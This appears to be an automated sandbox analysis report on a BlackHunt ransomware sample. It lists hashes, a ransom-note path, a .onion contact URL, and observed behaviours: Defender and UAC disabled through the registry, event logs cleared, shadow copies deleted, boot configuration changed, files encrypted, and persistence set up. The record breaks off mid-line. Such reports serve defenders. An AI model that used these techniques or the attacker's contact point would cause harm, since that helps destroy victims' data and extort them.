Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 23:27
Static task
static1
Behavioral task
behavioral1
Sample
59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe
Resource
win10v2004-20231222-en
General
-
Target
59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe
-
Size
707KB
-
MD5
c80048c966844defaf6a040e23f02d1a
-
SHA1
d19ff5757ed5ec7e8de3467f275c6d044c1b3fe5
-
SHA256
59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46
-
SHA512
c7ba3d24af25d0b22166b6b39308591e3debe446a402967d6ec210de345379de368ae938ddd81cd317370f38e8a1bc9a65e5ec875c25bda544ccdda7ac4f9e2d
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1689vnh:6uaTmkZJ+naie5OTamgEoKxLWhJh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3392 fsutil.exe 3400 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3368 wevtutil.exe 1144 wevtutil.exe 2080 wevtutil.exe 1624 wevtutil.exe 1832 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2756 bcdedit.exe 3428 bcdedit.exe 380 bcdedit.exe 2952 bcdedit.exe -
Renames multiple (2861) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3268 wbadmin.exe 1076 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 4072 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\J: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\K: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\N: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\M: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\P: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\S: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\H: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\Z: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\R: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\I: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\X: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\V: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\B: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\E: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\T: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\O: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\U: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\G: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\Y: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\L: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\zipfs.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\PushResume.zip 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\DVD Maker\bod_r.TTF 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#BlackHunt_ReadMe.txt 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#BlackHunt_Private.key 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#BlackHunt_Private.key 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\Java\jdk1.7.0_80\db\#BlackHunt_ReadMe.hta 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitemask1047.png 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\#BlackHunt_Private.key 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\Java\jre7\lib\deploy\#BlackHunt_ReadMe.hta 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\#BlackHunt_Private.key 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#BlackHunt_ReadMe.hta 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\#BlackHunt_ReadMe.hta 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialoccasion.png 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\#BlackHunt_ReadMe.txt 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_matte2.wmv 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Juan 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#BlackHunt_Private.key 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#BlackHunt_ReadMe.txt 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\#BlackHunt_Private.key 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#BlackHunt_ReadMe.txt 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#BlackHunt_Private.key 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_Private.key 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\#BlackHunt_Private.key 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#BlackHunt_Private.key 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3744 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1488 vssadmin.exe 3168 vssadmin.exe 3280 vssadmin.exe 2744 vssadmin.exe 2988 vssadmin.exe 3352 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4004 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1340 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2164 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe Token: SeRestorePrivilege 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe Token: SeBackupPrivilege 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe Token: SeTakeOwnershipPrivilege 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe Token: SeAuditPrivilege 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe Token: SeSecurityPrivilege 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe Token: SeIncBasePriorityPrivilege 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe Token: SeBackupPrivilege 1192 vssvc.exe Token: SeRestorePrivilege 1192 vssvc.exe Token: SeAuditPrivilege 1192 vssvc.exe Token: SeBackupPrivilege 2496 wbengine.exe Token: SeRestorePrivilege 2496 wbengine.exe Token: SeSecurityPrivilege 2496 wbengine.exe Token: SeSecurityPrivilege 1832 wevtutil.exe Token: SeBackupPrivilege 1832 wevtutil.exe Token: SeSecurityPrivilege 1624 wevtutil.exe Token: SeBackupPrivilege 1624 wevtutil.exe Token: SeSecurityPrivilege 2080 wevtutil.exe Token: SeBackupPrivilege 2080 wevtutil.exe Token: SeSecurityPrivilege 1144 wevtutil.exe Token: SeBackupPrivilege 1144 wevtutil.exe Token: SeSecurityPrivilege 3368 wevtutil.exe Token: SeBackupPrivilege 3368 wevtutil.exe Token: SeDebugPrivilege 4004 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2848 wrote to memory of 2556 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 29 PID 2848 wrote to memory of 2556 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 29 PID 2848 wrote to memory of 2556 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 29 PID 2848 wrote to memory of 2556 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 29 PID 2848 wrote to memory of 1420 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 42 PID 2848 wrote to memory of 1420 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 42 PID 2848 wrote to memory of 1420 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 42 PID 2848 wrote to memory of 1420 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 42 PID 2848 wrote to memory of 2616 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 40 PID 2848 wrote to memory of 2616 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 40 PID 2848 wrote to memory of 2616 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 40 PID 2848 wrote to memory of 2616 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 40 PID 2556 wrote to memory of 2684 2556 cmd.exe 35 PID 2556 wrote to memory of 2684 2556 cmd.exe 35 PID 2556 wrote to memory of 2684 2556 cmd.exe 35 PID 2848 wrote to memory of 2688 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 34 PID 2848 wrote to memory of 2688 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 34 PID 2848 wrote to memory of 2688 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 34 PID 2848 wrote to memory of 2688 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 34 PID 2848 wrote to memory of 2696 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 32 PID 2848 wrote to memory of 2696 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 32 PID 2848 wrote to memory of 2696 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 32 PID 2848 wrote to memory of 2696 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 32 PID 2848 wrote to memory of 2752 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 37 PID 2848 wrote to memory of 2752 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 37 PID 2848 wrote to memory of 2752 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 37 PID 2848 wrote to memory of 2752 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 37 PID 2848 wrote to memory of 2744 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 144 PID 2848 wrote to memory of 2744 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 144 PID 2848 wrote to memory of 2744 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 144 PID 2848 wrote to memory of 2744 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 144 PID 2848 wrote to memory of 2780 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 46 PID 2848 wrote to memory of 2780 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 46 PID 2848 wrote to memory of 2780 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 46 PID 2848 wrote to memory of 2780 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 46 PID 2616 wrote to memory of 2640 2616 cmd.exe 47 PID 2616 wrote to memory of 2640 2616 cmd.exe 47 PID 2616 wrote to memory of 2640 2616 cmd.exe 47 PID 1420 wrote to memory of 2504 1420 cmd.exe 45 PID 1420 wrote to memory of 2504 1420 cmd.exe 45 PID 1420 wrote to memory of 2504 1420 cmd.exe 45 PID 2848 wrote to memory of 2792 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 44 PID 2848 wrote to memory of 2792 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 44 PID 2848 wrote to memory of 2792 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 44 PID 2848 wrote to memory of 2792 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 44 PID 2848 wrote to memory of 2496 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 151 PID 2848 wrote to memory of 2496 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 151 PID 2848 wrote to memory of 2496 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 151 PID 2848 wrote to memory of 2496 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 151 PID 2688 wrote to memory of 2444 2688 cmd.exe 49 PID 2688 wrote to memory of 2444 2688 cmd.exe 49 PID 2688 wrote to memory of 2444 2688 cmd.exe 49 PID 2848 wrote to memory of 2708 2848 